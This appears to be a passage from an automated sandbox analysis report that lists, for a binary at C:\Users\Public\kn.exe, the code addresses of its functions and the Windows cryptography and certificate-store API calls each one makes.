        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080007D0 memset,#357,#360,#359,#357,#358,LoadCursorW,SetCursor,#360,#358,CertGetPublicKeyLength,GetLastError,#357,strcmp,GetLastError,#357,CryptFindOIDInfo,#357,#357,LocalFree,#357,LocalFree,#358,#358,#357,SetCursor,SetCursor,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,#357,#225,#359,#359,#357,#359,LocalFree,#359,#223,#359,#357,#223,#359,#359,#359,DialogBoxParamW,SysStringByteLen,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,SysFreeString,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,9_2_00007FF6080007D0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF07F4 BCryptDestroyKey,#205,#357,9_2_00007FF607FF07F4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDC7F0 GetLastError,#357,CertOpenStore,GetLastError,CertEnumCertificatesInStore,CertCompareCertificateName,CertFindExtension,CryptDecodeObject,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CertSetCTLContextProperty,GetLastError,#357,GetSystemTimeAsFileTime,I_CryptCreateLruEntry,GetLastError,#357,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,GetLastError,#357,CertEnumCertificatesInStore,I_CryptCreateLruEntry,GetLastError,#357,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,CertFreeCertificateChain,GetLastError,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,#357,CertCloseStore,CertFreeCertificateContext,9_2_00007FF607FDC7F0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608028814 NCryptIsKeyHandle,NCryptIsKeyHandle,#357,#359,#357,CryptFindOIDInfo,LocalAlloc,#357,LocalAlloc,#357,CryptFindOIDInfo,#359,LocalAlloc,#357,memmove,LocalFree,#357,9_2_00007FF608028814
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F76824 CryptHashCertificate,GetLastError,#357,9_2_00007FF607F76824
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF0844 BCryptExportKey,#205,#359,#357,#357,9_2_00007FF607FF0844
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60805E8B0 CryptDecodeObjectEx,GetLastError,CryptBinaryToStringW,GetLastError,memset,CryptBinaryToStringW,??3@YAXPEAX@Z,LocalFree,9_2_00007FF60805E8B0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F6A8CC CryptFindLocalizedName,CertEnumCertificatesInStore,CertFindCertificateInStore,CertGetCRLContextProperty,#357,#357,#357,CertEnumCertificatesInStore,9_2_00007FF607F6A8CC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF08EC BCryptGetProperty,#205,#359,#357,#357,9_2_00007FF607FF08EC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608024914 GetLastError,#359,CryptGetUserKey,CryptGetUserKey,GetLastError,#357,CryptDestroyKey,CryptReleaseContext,9_2_00007FF608024914
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDE914 CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,GetLastError,GetLastError,GetLastError,#357,CryptDestroyHash,9_2_00007FF607FDE914
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FAF944 CryptDecodeObject,GetLastError,#357,9_2_00007FF607FAF944
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDB950 I_CryptGetLruEntryData,#357,9_2_00007FF607FDB950
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608019970 LocalAlloc,#357,LocalAlloc,CertGetEnhancedKeyUsage,GetLastError,#358,LocalFree,LocalFree,GetLastError,strcmp,#357,CryptFindOIDInfo,LocalFree,9_2_00007FF608019970
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD597C GetLastError,CryptEncodeObjectEx,GetLastError,#357,9_2_00007FF607FD597C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F87988 CryptFindOIDInfo,#357,CryptFindOIDInfo,#357,GetLastError,#357,GetLastError,#357,LocalFree,9_2_00007FF607F87988
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60804B980 #357,CryptFindOIDInfo,#359,GetLastError,#357,#359,CryptGetProvParam,memset,CryptGetProvParam,CryptFindOIDInfo,#357,GetLastError,#357,CryptReleaseContext,BCryptFreeBuffer,9_2_00007FF60804B980
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F7F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,9_2_00007FF607F7F9B8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDB9CC I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,9_2_00007FF607FDB9CC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60802BA14 NCryptIsKeyHandle,#357,CryptGetProvParam,GetLastError,NCryptFreeObject,9_2_00007FF60802BA14
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF1A44 CryptContextAddRef,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,9_2_00007FF607FF1A44
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60800BA50 CryptSignCertificate,SetLastError,9_2_00007FF60800BA50
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F83A40 LocalFree,LocalFree,strcmp,#357,strcmp,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,CryptDecodeObject,strcmp,LocalFree,strcmp,GetLastError,#357,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,#357,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,strcmp,strcmp,strcmp,#357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,LocalFree,strcmp,LocalFree,GetLastError,strcmp,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF607F83A40
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608009A58 #357,#357,#210,#357,SetWindowTextW,SetFocus,SendMessageW,SendMessageW,LocalAlloc,#357,#357,LocalFree,UpdateWindow,CoInitialize,LoadCursorW,SetCursor,LoadCursorW,SetCursor,SetFocus,SetWindowTextW,SetFocus,#357,SetFocus,SendMessageW,#357,LocalFree,LocalFree,LocalFree,CryptUIDlgFreeCAContext,CoUninitialize,9_2_00007FF608009A58
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF7A70 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,NCryptSecretAgreement,#205,#357,#357,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,NCryptDeriveKey,#205,#359,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,9_2_00007FF607FF7A70
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801FA84 LocalAlloc,#357,memmove,CryptDecrypt,GetLastError,#357,LocalFree,9_2_00007FF60801FA84
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608055AA8 CryptDecodeObjectEx,9_2_00007FF608055AA8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE9AF8 CertCloseStore,CertCloseStore,CryptMsgClose,LocalFree,LocalFree,NCryptFreeObject,9_2_00007FF607FE9AF8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB3B14 NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,CryptDestroyKey,9_2_00007FF607FB3B14
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60802BB50 NCryptIsKeyHandle,#359,CertCreateCertificateContext,GetLastError,LocalFree,CryptGetKeyParam,GetLastError,#358,LocalAlloc,#357,CryptGetKeyParam,GetLastError,#357,9_2_00007FF60802BB50
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FBBB38 #357,CryptVerifyCertificateSignatureEx,GetLastError,#357,memcmp,GetSystemTimeAsFileTime,CompareFileTime,CompareFileTime,CompareFileTime,#357,#358,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF607FBBB38
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FFFB50 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,#357,CryptExportPublicKeyInfo,GetLastError,GetLastError,#357,#357,CertFindExtension,LocalAlloc,#357,memmove,#357,#357,#357,#357,#357,CAFindCertTypeByName,CAGetCertTypeExtensions,#357,#358,CertFindExtension,#357,LocalAlloc,memmove,memmove,#357,#357,GetLastError,#357,CertFindExtension,#357,GetLastError,#357,CryptSignAndEncodeCertificate,GetLastError,#357,LocalAlloc,CryptSignAndEncodeCertificate,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CAFreeCertTypeExtensions,CACloseCertType,9_2_00007FF607FFFB50
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608025B44 CertFindExtension,#357,CryptDecodeObject,GetLastError,9_2_00007FF608025B44
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608027B60 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptFindOIDInfo,LocalAlloc,#357,memmove,CryptReleaseContext,9_2_00007FF608027B60
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F7BB80 #357,NCryptIsKeyHandle,#357,LocalFree,LocalFree,9_2_00007FF607F7BB80
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608055B90 CryptDecodeObjectEx,memmove,9_2_00007FF608055B90
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801FB94 #357,CryptFindOIDInfo,LocalAlloc,CryptEncryptMessage,GetLastError,LocalFree,#357,9_2_00007FF60801FB94
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F55BA4 #357,NCryptIsKeyHandle,strcmp,GetLastError,strcmp,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#359,LocalAlloc,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,LocalFree,SysFreeString,CertFreeCertificateContext,LocalFree,LocalFree,CryptReleaseContext,9_2_00007FF607F55BA4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FFBBC0 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,CryptSignHashW,#205,GetLastError,#357,#359,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,9_2_00007FF607FFBBC0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F79BC8 #357,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,SysFreeString,#357,#357,strcmp,SysFreeString,#357,SysFreeString,GetLastError,strcmp,LocalFree,LocalFree,CryptDecodeObject,strcmp,strcmp,strcmp,SysFreeString,LocalFree,9_2_00007FF607F79BC8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF3BEB _CxxThrowException,_CxxThrowException,_CxxThrowException,CryptExportKey,#205,GetLastError,#357,#357,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,9_2_00007FF607FF3BEB
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F8FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,9_2_00007FF607F8FC20
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FAFC34 memset,#357,CryptDecodeObject,GetLastError,LocalAlloc,#357,memmove,memset,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF607FAFC34
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608055C54 CryptDecodeObjectEx,CryptDecodeObjectEx,9_2_00007FF608055C54
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F91C50 BCryptQueryProviderRegistration,#360,#357,BCryptFreeBuffer,9_2_00007FF607F91C50
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA3C60 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,CryptExportPublicKeyInfo,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertCreateCertificateContext,GetLastError,#357,#357,CertComparePublicKeyInfo,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertSetCTLContextProperty,GetLastError,#357,#357,#358,#358,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,9_2_00007FF607FA3C60
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE1C84 GetLastError,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,#357,LocalFree,9_2_00007FF607FE1C84
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE5CE8 #357,CertOpenStore,GetLastError,CertFindCertificateInStore,GetLastError,#359,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptVerifyCertificateSignature,GetLastError,#357,9_2_00007FF607FE5CE8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801FD2C CryptDecryptMessage,GetLastError,#357,9_2_00007FF60801FD2C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60800DD1C #357,strcmp,GetLastError,CryptHashCertificate,GetLastError,LocalAlloc,memmove,LocalFree,9_2_00007FF60800DD1C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60802BD3C NCryptIsKeyHandle,#357,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,LocalFree,9_2_00007FF60802BD3C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608027D3C #357,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,wcschr,CryptFindOIDInfo,#359,LocalFree,9_2_00007FF608027D3C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD3D60 #359,GetLastError,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,CryptReleaseContext,9_2_00007FF607FD3D60
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608055D74 CryptDecodeObjectEx,strcmp,strcmp,9_2_00007FF608055D74
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB1D70 #357,LocalAlloc,memmove,#357,CryptSetKeyParam,GetLastError,LocalAlloc,memmove,CryptDecrypt,GetLastError,#357,#357,#358,LocalFree,LocalFree,#357,#357,#357,LocalFree,LocalFree,LocalFree,9_2_00007FF607FB1D70
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA9D6C #357,#357,#359,LocalAlloc,#357,#357,wcsrchr,LocalAlloc,memmove,CryptFindLocalizedName,wcsrchr,CryptFindLocalizedName,#357,GetLastError,#359,CertOpenStore,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF607FA9D6C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FADD80 CertFindExtension,CryptDecodeObject,9_2_00007FF607FADD80
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608005D80 #357,NCryptIsKeyHandle,GetSecurityDescriptorLength,CryptSetProvParam,GetLastError,LocalFree,#357,9_2_00007FF608005D80
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F85DA1 #358,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,9_2_00007FF607F85DA1
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F61DE8 GetSystemDefaultLangID,wcscspn,LocalFree,LocalFree,CryptEnumOIDInfo,qsort,free,9_2_00007FF607F61DE8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F85DF7 GetLastError,#357,#357,#358,#358,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCRLsInStore,CertEnumCRLsInStore,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,#357,9_2_00007FF607F85DF7
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE1E2C CryptAcquireContextW,GetLastError,#357,CryptGenKey,GetLastError,CryptDestroyKey,#357,GetLastError,#357,#357,LocalAlloc,#357,memmove,LocalFree,memset,CryptGenRandom,GetLastError,#357,GetSystemTime,SystemTimeToFileTime,GetLastError,CertCreateCertificateContext,GetLastError,CryptReleaseContext,LocalFree,LocalFree,LocalFree,9_2_00007FF607FE1E2C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608055E3C CryptDecodeObjectEx,strcmp,strcmp,strcmp,9_2_00007FF608055E3C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801DE70 NCryptIsKeyHandle,#357,CryptExportKey,GetLastError,#358,LocalAlloc,#357,CryptExportKey,GetLastError,LocalFree,9_2_00007FF60801DE70
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FADEA4 memset,GetSystemTimeAsFileTime,CryptGenRandom,GetLastError,LocalAlloc,GetLastError,#357,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,9_2_00007FF607FADEA4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDDEB0 wcscspn,#357,GetFileAttributesW,GetLastError,#359,CertEnumCertificatesInStore,CertGetCRLContextProperty,CryptBinaryToStringW,wcsstr,CertEnumCertificatesInStore,GetLastError,GetLastError,LocalFree,LocalFree,CertCloseStore,CertFreeCertificateContext,9_2_00007FF607FDDEB0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608027EE8 CryptFindOIDInfo,#357,CryptInitOIDFunctionSet,CryptGetOIDFunctionAddress,GetLastError,GetLastError,GetLastError,#357,strcmp,GetLastError,strcmp,GetLastError,CryptFindOIDInfo,CryptFindOIDInfo,#357,LocalFree,LocalFree,CryptFreeOIDFunctionAddress,LocalFree,LocalFree,9_2_00007FF608027EE8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE5F04 #357,#357,SysAllocStringByteLen,#357,SysFreeString,#357,#359,#357,lstrcmpW,CryptMsgControl,GetLastError,#357,CertFreeCertificateContext,#359,CertFreeCTLContext,LocalFree,SysFreeString,LocalFree,9_2_00007FF607FE5F04
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA7F14 CryptAcquireCertificatePrivateKey,GetLastError,#357,CryptSetProvParam,GetLastError,GetSecurityDescriptorLength,#359,CryptReleaseContext,9_2_00007FF607FA7F14
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608055F20 CryptDecodeObjectEx,9_2_00007FF608055F20
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FC5F54 GetLastError,LocalAlloc,memmove,wcschr,CryptFindOIDInfo,#357,#357,LocalFree,LocalFree,9_2_00007FF607FC5F54
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F8FF64 NCryptGetProperty,#359,NCryptGetProperty,CertEnumCertificatesInStore,CertFindCertificateInStore,CertFreeCertificateContext,CertEnumCertificatesInStore,CertFreeCertificateContext,CertCloseStore,CertCloseStore,#357,9_2_00007FF607F8FF64
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF9F90 memmove,wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,9_2_00007FF607FF9F90
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF5FA8 NCryptIsKeyHandle,wcscmp,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,9_2_00007FF607FF5FA8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608055FF0 CryptDecodeObjectEx,CryptDecodeObjectEx,9_2_00007FF608055FF0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F85FE8 #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,9_2_00007FF607F85FE8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801E044 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,LocalAlloc,#359,LocalFree,9_2_00007FF60801E044
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FC4070 _wcsnicmp,_wcsnicmp,_wcsnicmp,#357,GetLastError,#359,#357,LocalAlloc,memmove,wcsstr,#223,#357,#359,LocalFree,#359,LocalFree,LocalFree,LocalFree,LocalFree,CryptMemFree,9_2_00007FF607FC4070
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F860DA #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,9_2_00007FF607F860DA
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD5164 GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,9_2_00007FF607FD5164
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDF168 CryptDuplicateKey,GetLastError,#357,CryptEncrypt,GetLastError,CryptEncrypt,GetLastError,CryptDestroyKey,9_2_00007FF607FDF168
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608027178 BCryptCloseAlgorithmProvider,#360,9_2_00007FF608027178
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD3188 CryptAcquireContextW,GetLastError,#359,#359,CryptAcquireContextW,GetLastError,9_2_00007FF607FD3188
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FC51A4 #360,#357,#359,#207,CryptFindOIDInfo,#357,GetLastError,#357,#207,#360,#254,#358,LocalFree,LocalFree,LocalFree,9_2_00007FF607FC51A4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080271C8 BCryptDestroyKey,#360,9_2_00007FF6080271C8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF31C0 CryptGetKeyParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,9_2_00007FF607FF31C0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF11C8 NCryptVerifySignature,#205,#357,#357,#357,#357,9_2_00007FF607FF11C8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608049208 #357,NCryptEnumKeys,#360,#358,9_2_00007FF608049208
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608027214 NCryptIsKeyHandle,#357,CryptReleaseContext,GetLastError,9_2_00007FF608027214
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F8D240 #357,CryptFindOIDInfo,#357,LocalFree,9_2_00007FF607F8D240
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801D28C CryptFindOIDInfo,CryptEnumOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,#358,9_2_00007FF60801D28C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608027290 NCryptIsKeyHandle,#359,#360,#357,#358,9_2_00007FF608027290
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FBB2B4 #357,CryptHashCertificate,GetLastError,#357,memcmp,#358,9_2_00007FF607FBB2B4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF32A8 CryptGetProvParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,9_2_00007FF607FF32A8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB92C4 memset,CryptHashCertificate,GetLastError,CryptHashCertificate,GetLastError,GetLastError,GetLastError,#357,#254,LocalAlloc,wcsstr,LocalAlloc,LocalAlloc,#357,memmove,GetLastError,GetProcAddress,GetLastError,GetLastError,#359,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FreeLibrary,9_2_00007FF607FB92C4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD32D0 #359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,9_2_00007FF607FD32D0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FC92D8 CertEnumCertificatesInStore,CertGetCRLContextProperty,CertSetCTLContextProperty,GetLastError,#357,#357,CertEnumCertificatesInStore,CryptMsgControl,GetLastError,#357,CryptMsgGetAndVerifySigner,GetLastError,#357,CryptMsgGetAndVerifySigner,#357,CertFreeCertificateContext,CertGetCRLContextProperty,CertEnumCertificatesInStore,#357,#357,#207,LocalFree,#357,#357,CertFreeCertificateContext,CompareFileTime,CertFreeCertificateContext,9_2_00007FF607FC92D8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FEF2F0 BCryptCreateHash,#205,#357,#357,#357,#357,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,9_2_00007FF607FEF2F0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F8D304 #357,CryptFindOIDInfo,#359,LocalAlloc,CryptEncodeObjectEx,GetLastError,LocalFree,LocalFree,LocalFree,9_2_00007FF607F8D304
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDD30C BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,9_2_00007FF607FDD30C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F8B324 CryptDecodeObject,GetLastError,#357,#357,LocalFree,9_2_00007FF607F8B324
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB5338 wcsrchr,#357,#357,LocalAlloc,memmove,wcsrchr,GetLastError,#360,#357,#357,LocalFree,LocalFree,LocalFree,CryptReleaseContext,9_2_00007FF607FB5338
